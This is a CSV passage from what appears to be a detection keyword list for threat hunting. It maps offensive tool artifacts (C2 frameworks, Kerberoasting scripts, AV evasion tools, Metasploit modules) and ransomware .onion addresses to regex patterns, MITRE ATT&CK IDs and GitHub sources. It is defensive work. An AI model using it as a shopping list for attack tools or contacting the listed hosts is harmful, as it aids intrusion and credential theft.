"*AutoC2/Dependencies*",".{0,1000}AutoC2\/Dependencies.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34282"
"*AutoC2/Initial_Access*",".{0,1000}AutoC2\/Initial_Access.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34283"
"*AutoC2/Lateral.sh*",".{0,1000}AutoC2\/Lateral\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34284"
"*AutoC2/Payload_Development*",".{0,1000}AutoC2\/Payload_Development.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34285"
"*AutoC2/Recon*",".{0,1000}AutoC2\/Recon.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34286"
"*AutoC2/Situational_Awareness*",".{0,1000}AutoC2\/Situational_Awareness.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34287"
"*AutoC2/Social.sh*",".{0,1000}AutoC2\/Social\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34288"
"*AutoC2/Staging*",".{0,1000}AutoC2\/Staging.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34289"
"*AutoC2/Web.sh*",".{0,1000}AutoC2\/Web\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34290"
"*AutoC2/Wireless.sh*",".{0,1000}AutoC2\/Wireless\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34291"
"*AutoC2/Wordlists*",".{0,1000}AutoC2\/Wordlists.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","1","N/A","N/A","10","8","707","112","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z","34292"
"*AutoCompletionHandlerC2ServerManager*",".{0,1000}AutoCompletionHandlerC2ServerManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","34293"
"*AutoCrypt_Password.txt*",".{0,1000}AutoCrypt_Password\.txt.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34294"
"*autodiscover/brute.go*",".{0,1000}autodiscover\/brute\.go.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","34295"
"*autoexploit.rc*",".{0,1000}autoexploit\.rc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34296"
"*autokerberoast.ps1*",".{0,1000}autokerberoast\.ps1.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","34302"
"*autokerberoast_noMimikatz.ps1",".{0,1000}autokerberoast_noMimikatz\.ps1","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","34303"
"*autoKirbi2hashcat.py*",".{0,1000}autoKirbi2hashcat\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","34304"
"*autolace.twilightparadox.com*",".{0,1000}autolace\.twilightparadox\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","34305"
"*automachine.servequake.com*",".{0,1000}automachine\.servequake\.com.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","34306"
"*AutoNSE*",".{0,1000}AutoNSE.{0,1000}","offensive_tool_keyword","autonse","Massive NSE (Nmap Scripting Engine) AutoSploit and AutoScanner. The Nmap Scripting Engine (NSE) is one of Nmaps most powerful and flexible features. It allows users to write (and share) simple scripts (using the Lua programming language ) to automate a wide variety of networking tasks. Those scripts are executed in parallel with the speed and efficiency you expect from Nmap. Users can rely on the growing and diverse set of scripts distributed with Nmap. or write their own to meet custom needs. For more informations https://nmap.org/book/man-nse.html","T1059.001 - T1059.003 - T1059.005 - T1059.006 - T1027 - T1064 - T1086 - T1085","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/m4ll0k/AutoNSE","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","34307"
"*autopwn*",".{0,1000}autopwn.{0,1000}","offensive_tool_keyword","autopwn","tools for pentester. autopwn is designed to make a pentesters life easier and more consistent by allowing them to specify tools they would like to run against targets. without having to type them in a shell or write a script. This tool will probably be useful during certain exams as well..","T1583 - T1059 - T1216 - T1053 - T1027","TA0002 - TA0008 - TA0003","N/A","N/A","Exploitation tool","https://github.com/nccgroup/autopwn","1","1","N/A","N/A","N/A","4","389","89","2019-04-23T09:58:28Z","2015-02-23T08:18:01Z","34308"
"*AutoPwnKey Agent Manager*",".{0,1000}AutoPwnKey\sAgent\sManager.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34309"
"*AutoPwnKey.AgentManager*",".{0,1000}AutoPwnKey\.AgentManager.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34310"
"*autopwnkey.db*",".{0,1000}autopwnkey\.db.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34311"
"*AutoPwnKey-agent*",".{0,1000}AutoPwnKey\-agent.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34312"
"*AutoPwnKey-server*",".{0,1000}AutoPwnKey\-server.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34313"
"*AutoPwnKey-server/logs*",".{0,1000}AutoPwnKey\-server\/logs.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","34314"
"*AutoRDPwn*",".{0,1000}AutoRDPwn.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","N/A","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","34315"
"*AutoRDPwn.ps1*",".{0,1000}AutoRDPwn\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Framework","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","10","1103","499","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z","34316"
"*autorecon -t *",".{0,1000}autorecon\s\-t\s.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","34317"
"*AutoRecon\autorecon.py*",".{0,1000}AutoRecon\\autorecon\.py.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","34318"
"*AutoSmuggle.csproj*",".{0,1000}AutoSmuggle\.csproj.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","34319"
"*AutoSmuggle.exe*",".{0,1000}AutoSmuggle\.exe.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","34320"
"*AutoSmuggle.sln*",".{0,1000}AutoSmuggle\.sln.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","34321"
"*AutoSmuggle-master*",".{0,1000}AutoSmuggle\-master.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","1","N/A","N/A","9","3","240","26","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z","34322"
"*autostart/ares.desktop*",".{0,1000}autostart\/ares\.desktop.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","N/A","10","10","1588","477","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z","34323"
"*AutoSUID-main.*",".{0,1000}AutoSUID\-main\..{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","1","N/A","N/A","7","4","375","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z","34324"
"*autoTGS_NtlmCrack.py*",".{0,1000}autoTGS_NtlmCrack\.py.{0,1000}","offensive_tool_keyword","kerberoast","Kerberoast is a series of tools for attacking MS Kerberos implementations","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","APT20","Credential Access","https://github.com/xan7r/kerberoast","1","1","N/A","N/A","N/A","1","73","18","2017-07-22T22:28:12Z","2016-06-08T22:58:45Z","34325"
"*aux/dump_credentials*",".{0,1000}aux\/dump_credentials.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34328"
"*aux/enum_system.rc*",".{0,1000}aux\/enum_system\.rc.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34329"
"*aux/msf/*",".{0,1000}aux\/msf\/.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34330"
"*aux/persistence.rc",".{0,1000}aux\/persistence\.rc","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34331"
"*aux/privilege_escalation.*",".{0,1000}aux\/privilege_escalation\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34332"
"*aux/Start-Webserver.ps1*",".{0,1000}aux\/Start\-Webserver\.ps1.{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","34333"
"*auxiliary/crawler*",".{0,1000}auxiliary\/crawler.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34334"
"*auxiliary/sqli/*",".{0,1000}auxiliary\/sqli\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34335"
"*av_hips_executables.txt*",".{0,1000}av_hips_executables\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34336"
"*avaddonbotrxmuyl.onion*",".{0,1000}avaddonbotrxmuyl\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34337"
"*avaddongun7rngel.onion*",".{0,1000}avaddongun7rngel\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34338"
"*Available ProgIDs and CLSIDs for DLL Hijacking:*",".{0,1000}Available\sProgIDs\sand\sCLSIDs\sfor\sDLL\sHijacking\:.{0,1000}","offensive_tool_keyword","DLHell","Local & remote Windows DLL Proxying","T1574.002 - T1055","TA0005 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/synacktiv/DLHell","1","0","N/A","N/A","9","2","163","24","2024-06-17T16:20:10Z","2024-04-17T13:00:12Z","34339"
"*avast_memory_dump.md*",".{0,1000}avast_memory_dump\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","34340"
"*avet-master.zip*",".{0,1000}avet\-master\.zip.{0,1000}","offensive_tool_keyword","avet","AVET is an AntiVirus Evasion Tool. which was developed for making life easier for pentesters and for experimenting with antivirus evasion techniques. as well as other methods used by malicious software. For an overview of new features in v2.3. as well as past version increments. have a look at the CHANGELOG file.","T1055 - T1027 - T1566","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/govolution/avet","1","1","N/A","N/A","10","10","1694","338","2023-10-12T15:00:05Z","2017-01-28T14:56:47Z","34342"
"*avflagged.exe*",".{0,1000}avflagged\.exe.{0,1000}","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","N/A","10","8","773","122","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z","34343"
"*avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion*",".{0,1000}avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","34344"
